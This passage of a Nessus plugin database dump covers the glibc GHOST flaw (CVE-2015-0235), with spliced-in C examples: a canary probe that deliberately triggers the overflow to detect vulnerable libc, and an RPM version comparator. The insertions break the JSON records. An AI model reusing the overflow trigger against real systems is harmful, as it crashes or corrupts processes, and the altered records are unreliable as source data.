reference:\"glibc-devel-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.74.13\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.74.13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:47", "description": "From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
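Added example, not code from the IBM advisory, from Red Hat or from any of the Nessus plugins above: a stand-alone C check for the __nss_hostname_digits_dots() overflow described above, modelled on the canary test that Qualys published with its GHOST advisory. It hands gethostbyname_r() a 1024-byte buffer that is immediately followed by a canary string, then asks it to resolve a name made only of digits whose length makes the vulnerable size calculation come out to exactly 1024 bytes. The unfixed code accepts that name and writes sizeof(char *) bytes past the buffer (4 on 32-bit, 8 on 64-bit), clobbering the canary; the fixed code also counts the h_alias_ptr slot and refuses with ERANGE. The function and enum names and the 16-byte host_addr figure are this example's own assumptions:

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* glibc declares gethostbyname_r() under this */
#endif
#include <errno.h>
#include <netdb.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define GHOST_CANARY "in_the_coal_mine"

enum ghost_status {
    GHOST_NOT_VULNERABLE = 0, /* glibc refused the name with ERANGE, canary intact */
    GHOST_VULNERABLE     = 1, /* the canary sitting behind the buffer was overwritten */
    GHOST_UNEXPECTED     = 2  /* neither: the libc did not take glibc's digits-and-dots path */
};

/* The buffer handed to gethostbyname_r(), with a canary placed right after it
   so that an overflow of even a few bytes is visible. (Example-specific layout.) */
static struct {
    char buffer[1024];
    char canary[sizeof(GHOST_CANARY)];
} ghost_probe = { "buffer", GHOST_CANARY };

/* Name length that makes the *vulnerable* size computation
   sizeof(*host_addr) + sizeof(*h_addr_ptrs) + strlen(name) + 1 equal buflen:
   host_addr is 16 bytes (room for an in6_addr), h_addr_ptrs is two char pointers,
   plus the terminating NUL. The omitted h_alias_ptr (one char pointer) is the overflow. */
size_t ghost_name_length(size_t buflen)
{
    return buflen - 16 * sizeof(unsigned char) - 2 * sizeof(char *) - 1;
}

enum ghost_status ghost_check(void)
{
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    char name[sizeof(ghost_probe.buffer)];
    size_t len = ghost_name_length(sizeof(ghost_probe.buffer));

    /* A name consisting only of digits is handled by __nss_hostname_digits_dots()
       before any resolver is consulted, so this runs offline. */
    memset(name, '0', len);
    name[len] = '\0';
    memcpy(ghost_probe.canary, GHOST_CANARY, sizeof(GHOST_CANARY)); /* reset between calls */

    int rc = gethostbyname_r(name, &resbuf, ghost_probe.buffer,
                             sizeof(ghost_probe.buffer), &result, &herrno);

    if (memcmp(ghost_probe.canary, GHOST_CANARY, sizeof(GHOST_CANARY)) != 0)
        return GHOST_VULNERABLE;       /* bytes were written past the 1024-byte buffer */
    if (rc == ERANGE)
        return GHOST_NOT_VULNERABLE;   /* fixed bounds check rejected the name */
    return GHOST_UNEXPECTED;
}

int main(void)
{
    static const char *label[] = { "not vulnerable", "vulnerable", "unexpected result" };
    printf("CVE-2015-0235 (GHOST) local libc check: %s\n", label[ghost_check()]);
    return 0;
}
```

Build with plain gcc; no network is needed because the digits-only name never reaches DNS. A "vulnerable" verdict means the C library the binary is linked against still has the bug. An "unexpected result" means the libc did not take glibc's digits-and-dots path at all (a non-glibc libc such as musl simply rejects the over-long name as not found), so on such a system this probe says nothing either way.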
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-30T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : glibc (ELSA-2015-0101) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2015-0101.NASL", "href": "https://www.tenable.com/plugins/nessus/81099", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0101 and \n# Oracle Linux Security Advisory ELSA-2015-0101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81099);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0101\");\n\n script_name(english:\"Oracle Linux 4 : glibc 
(ELSA-2015-0101) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0101 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004827.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57.0.1.el4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:15", "description": "This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that can lead to a local or remote buffer overflow.\n (bsc#913646). 
(CVE-2015-0235)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:10:glibc", "p-cpe:/a:novell:suse_linux:10:glibc-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-devel", "p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-html", "p-cpe:/a:novell:suse_linux:10:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:10:glibc-info", "p-cpe:/a:novell:suse_linux:10:glibc-locale", "p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:10:glibc-profile", "p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:10:nscd", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_GLIBC-9035.NASL", "href": "https://www.tenable.com/plugins/nessus/81125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81125);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"SuSE 10 Security Update : glibc (ZYPP Patch Number 9035)\");\n 
script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\n - A vulnerability was found and fixed in the GNU C\n Library, specifically in the function gethostbyname(),\n that can lead to a local or remote buffer overflow.\n (bsc#913646). (CVE-2015-0235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 9035.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-devel-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:10:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES10\") audit(AUDIT_OS_NOT, \"SuSE 10\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 
10\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-devel-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-html-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-i18ndata-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-info-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-locale-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-profile-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"nscd-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.113.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T14:22:31", "description": "The version of Cisco NX-OS software running on the remote device is affected by a remote code execution vulnerability known as GHOST. A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). 
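Added example, not code from Tenable or from the plugins above: each rpm_check(release:..., sp:..., reference:...) call above raises its flag when the installed package has the same name as the reference but an older version-release in RPM's ordering. The C below reimplements that ordering (rpm's rpmvercmp() segment rules, leaving out the newer '^' rule) and the name/version/release split, so you can see why glibc-2.11.3-17.45.55.4 is flagged against the SLES11 SP2 reference glibc-2.11.3-17.45.55.5 while glibc-2.11.3-17.74.13 is not. The sample package strings are constructed from the reference versions in the plugins; the function names and the NVR split are this example's own, and it deliberately omits what the real rpm_check() does first: match the release and service pack and filter by architecture.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* RPM's rpmvercmp(): split both strings into alpha and numeric segments and
   compare segment by segment. Numeric segments compare as integers (leading
   zeros ignored), alpha segments lexically, a numeric segment beats an alpha
   one, and '~' sorts before everything including end of string.
   (rpm's newer '^' rule is omitted here.) Returns -1, 0 or 1. */
int rpmvercmp(const char *a, const char *b)
{
    const char *one = a, *two = b;
    if (strcmp(a, b) == 0) return 0;
    while (*one || *two) {
        while (*one && !isalnum((unsigned char)*one) && *one != '~') one++;
        while (*two && !isalnum((unsigned char)*two) && *two != '~') two++;
        if (*one == '~' || *two == '~') {          /* tilde: pre-release marker */
            if (*one != '~') return 1;
            if (*two != '~') return -1;
            one++; two++;
            continue;
        }
        if (!(*one && *two)) break;                /* one side ran out of segments */
        const char *s1 = one, *s2 = two;
        int isnum = isdigit((unsigned char)*s1);
        if (isnum) {
            while (isdigit((unsigned char)*s1)) s1++;
            while (isdigit((unsigned char)*s2)) s2++;
        } else {
            while (isalpha((unsigned char)*s1)) s1++;
            while (isalpha((unsigned char)*s2)) s2++;
        }
        if (two == s2) return isnum ? 1 : -1;      /* segment types differ */
        if (isnum) {                               /* drop leading zeros, longer number wins */
            while (*one == '0') one++;
            while (*two == '0') two++;
        }
        size_t l1 = (size_t)(s1 - one), l2 = (size_t)(s2 - two);
        if (isnum && l1 != l2) return l1 < l2 ? -1 : 1;
        int rc = strncmp(one, two, l1 < l2 ? l1 : l2);
        if (rc) return rc < 0 ? -1 : 1;
        if (l1 != l2) return l1 < l2 ? -1 : 1;     /* "ab" < "abc" */
        one = s1; two = s2;
    }
    if (!*one && !*two) return 0;
    return !*one ? -1 : 1;
}

/* Split "name-version-release" at its last two hyphens, the form the plugins'
   rpm_check() references use (no epoch appears in them). Returns 0 if malformed. */
int rpm_nvr_split(const char *nvr, char *name, char *version, char *release, size_t cap)
{
    const char *r = strrchr(nvr, '-');
    if (!r || r == nvr) return 0;
    const char *v = r - 1;
    while (v > nvr && *v != '-') v--;
    if (*v != '-') return 0;
    size_t nl = (size_t)(v - nvr), vl = (size_t)(r - v - 1), rl = strlen(r + 1);
    if (!nl || !vl || !rl || nl >= cap || vl >= cap || rl >= cap) return 0;
    memcpy(name, nvr, nl);        name[nl] = '\0';
    memcpy(version, v + 1, vl);   version[vl] = '\0';
    memcpy(release, r + 1, rl);   release[rl] = '\0';
    return 1;
}

/* 1 if `installed` is the same package as `reference` but an older
   version-release (the condition that makes rpm_check() count a flag), else 0. */
int rpm_is_older(const char *installed, const char *reference)
{
    char n1[128], v1[128], r1[128], n2[128], v2[128], r2[128];
    if (!rpm_nvr_split(installed, n1, v1, r1, sizeof n1) ||
        !rpm_nvr_split(reference, n2, v2, r2, sizeof n2))
        return 0;
    if (strcmp(n1, n2) != 0) return 0;             /* different package: no verdict */
    int rc = rpmvercmp(v1, v2);                    /* version first, then release */
    if (rc == 0) rc = rpmvercmp(r1, r2);
    return rc < 0;
}

int main(void)
{
    /* Constructed sample pairs built from reference versions in the plugins above. */
    const char *installed[] = { "glibc-2.11.3-17.45.55.4", "glibc-2.11.3-17.74.13" };
    const char *reference = "glibc-2.11.3-17.45.55.5";   /* SLES11 SP2 fix */
    for (size_t i = 0; i < 2; i++)
        printf("%-26s vs %s -> %s\n", installed[i], reference,
               rpm_is_older(installed[i], reference) ? "FLAG (older)" : "ok");
    return 0;
}
```

One thing this shows that the plugin text only implies: without the service-pack match, the SP1 fix glibc-2.11.1-0.60.1 compares as older than the SP2 reference and would be reported as missing a patch it cannot install, which is why the plugins key every reference on sp:1, sp:2 or sp:3 instead of comparing all SLES11 hosts against a single string.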
An unauthenticated, remote attacker can exploit this to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2016-07-19T00:00:00", "type": "nessus", "title": "Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20150128-GHOST-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/92412", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92412);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus71708\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69648\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68591\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68892\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the NX-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco NX-OS software running on the remote device is\naffected by a remote code execution vulnerability known as GHOST. A\nheap-based buffer overflow condition exists in the GNU C Library\n(glibc) due to improper validation of user-supplied input to the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). An unauthenticated, remote attacker can exploit this\nto cause a buffer overflow, resulting in a denial of service condition\nor the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
